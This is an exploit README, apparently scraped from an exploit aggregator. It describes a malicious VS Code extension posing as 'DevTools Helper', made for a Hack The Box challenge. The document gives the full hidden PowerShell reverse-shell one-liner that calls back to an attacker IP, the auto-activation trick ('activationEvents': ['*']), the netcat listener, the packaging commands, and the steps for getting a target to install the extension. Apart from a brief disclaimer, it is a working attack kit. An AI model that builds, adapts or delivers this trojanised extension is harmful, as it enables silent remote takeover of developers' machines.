## https://sploitus.com/exploit?id=833581E3-D09A-5C85-BB3D-46DA43EDAF50
# DevTools Helper โ Malicious Extension PoC (CVE-2025-55319)
Proof-of-concept VS Code (`.vsix`) extension for the **HTB "Checkpoint"** challenge.
Once installed, the extension auto-activates and spawns a hidden PowerShell reverse
shell back to the attacker.
> โ ๏ธ **Authorized use only.** This is a CTF/lab artifact. Only deploy it against machines
> you own or are explicitly authorized to test (e.g. an HTB target box).
---
## How it works
- **`extension/package.json`** โ extension manifest. `"activationEvents": ["*"]` makes it
run the moment VS Code loads, with no user interaction.
- **`extension/extension.js`** โ on `activate()`, executes a base64-encoded PowerShell
payload with `-WindowStyle Hidden -NoProfile` for a silent reverse shell.
- **`[Content_Types].xml`** โ OpenXML content-type manifest so the folder can be zipped
into a valid `.vsix` package.
---
## Layout
```
.
โโโ [Content_Types].xml # VSIX content-type manifest
โโโ extension/
โโโ package.json # extension manifest (activates on "*")
โโโ extension.js # reverse-shell payload
```
---
## Usage
### 1. Build your payload
Generate a base64 (UTF-16LE) PowerShell reverse shell pointing at your attack box:
```bash
LHOST=10.10.15.158
LPORT=4443
PS="\$c=New-Object System.Net.Sockets.TCPClient('$LHOST',$LPORT);\$s=\$c.GetStream();[byte[]]\$b=0..65535|%{0};while((\$i=\$s.Read(\$b,0,\$b.Length)) -ne 0){\$d=(New-Object System.Text.ASCIIEncoding).GetString(\$b,0,\$i);\$r=(iex \$d 2>&1|Out-String);\$sb=([text.encoding]::ASCII).GetBytes(\$r+'PS> ');\$s.Write(\$sb,0,\$sb.Length);\$s.Flush()}"
echo -n "$PS" | iconv -t UTF-16LE | base64 -w0
```
Paste the output over `YOUR_BASE64_PAYLOAD_HERE` in `extension/extension.js`:
```js
const payload = ''
```
### 2. Start your listener
```bash
nc -lvnp 4443
```
### 3. Package into a .vsix
A `.vsix` is just a ZIP with the `extension/` folder plus the manifest at the root:
```bash
# from this directory
zip -r devtools-helper.vsix extension "[Content_Types].xml"
```
### 4. Deliver & trigger
Get the target to install the extension. Either:
- **CLI:** `code --install-extension devtools-helper.vsix`
- **GUI:** Extensions view โ `ยทยทยท` menu โ *Install from VSIXโฆ*
On the next VS Code launch (or immediately after install), the `*` activation event
fires, the payload runs, and your listener receives the shell.
```
$ nc -lvnp 4443
listening on [any] 4443 ...
connect to [10.10.15.158] from ...
PS>
```
---
## Cleanup
Remove the extension from the target when done:
```bash
code --uninstall-extension devtools.devtools-helper
```
---
## Notes
- The payload targets **Windows** (PowerShell). Adjust `extension.js` for other platforms.
- `os` is imported in `extension.js` but unused โ handy if you want to branch on
`os.platform()` to support Linux/macOS targets.
- Bump the `version` in `package.json` between builds if you re-package.